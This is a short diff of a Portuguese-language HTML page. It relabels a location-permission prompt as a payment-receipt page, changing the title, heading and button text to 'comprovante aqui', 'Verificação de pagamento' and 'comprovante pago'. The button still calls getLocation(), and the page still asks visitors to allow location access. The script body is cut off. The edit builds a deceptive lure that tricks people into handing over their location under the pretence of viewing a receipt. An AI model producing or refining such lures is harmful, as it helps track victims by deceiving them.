--- a/index.html
+++ b/index.html
@@ -2,12 +2,12 @@
 <html>
 <head>
   <meta charset="UTF-8">
-  <title>Confirmação de Localização</title>
+  <title>comprovante aqui</title>
 </head>
 <body>
-  <h2>Verificação de Localização</h2>
+  <h2>Verificação de pagamento</h2>
   <p>Aperte o botão abaixo e permita o acesso à localização para continuar.</p>
-  <button onclick="getLocation()">Permitir Localização</button>
+  <button onclick="getLocation()">comprovante pago</button>
   <p id="output"></p>
 
   <script>
